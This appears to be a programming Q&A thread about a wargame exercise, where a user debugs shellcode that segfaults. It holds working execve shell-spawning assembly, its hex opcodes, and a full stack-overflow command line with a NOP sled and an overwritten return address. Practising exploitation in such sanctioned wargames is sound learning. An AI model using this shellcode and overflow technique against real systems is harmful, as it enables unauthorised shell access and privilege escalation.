# Wargame payload segfaults when used as such

Tags: assembly, segmentation-fault, exploit

I am currently trying to complete Level5 of the io.netgarage.org wargame. To complete it i wrote the following asm payload:

```
global _start

section .text
_start:
    xor eax, eax
    push eax
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp

    push eax
    mov edx, esp

    push ebx
    mov ecx, esp

    mov al, 11
    int 0x80
```

which should spawn a shell by calling sys_execve, and it does. But only as long, as i don't use it as actuall payload.
As soon as i try to feed it to the vulnerable c programm, i get segfaulted. By inspecting it with gdb, i was able to pin the segfault to the line

```
mov edx, esp
```

Everything that should happen before (overwriting return address, NOP-Sled) actually works as intendet.

Additional Information:
- I get to OP-Codes by compiling above asm code with

```
nasm -f elf32 file.asm -o file.o
objdump -d file.o
```

- I call the vulnerable programm like this:

```
/levels/level05 $(python -c 'print "\x90"*115 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\xa0\xfb\xff\xbf"')
```

- The return address 0xbffffba0 i got by inspecting the values of the stack with gdb
- My current assumption is that it has to do something with the stack, because using a script i found online, utilizing a jmp-call-pop pattern, worked seemingly correctly

Thank you,
tarkes

Comment: `mov edx, esp` can not fault, you used gdb wrong. Unless the code is in non-executable memory, but you claim that is not the case. PS: nasm can produce a listing, you don't need to objdump

Comment: @Jester You are right, while the view i get when using `layout asm` shows me on the corresponding address is the instruction `mov edx, esp` examining the instruction pointer and/or the address directly gives me `add ch, edi`... Where does the discrepany come from?

Comment: `add ch, edi` doesn't even exist...

Comment: @Jester Amazing, huh?  
Thank you, i found the problem now, i overwrite my shellcode by pushing on the stack.  I am sorry if this was a stupid question.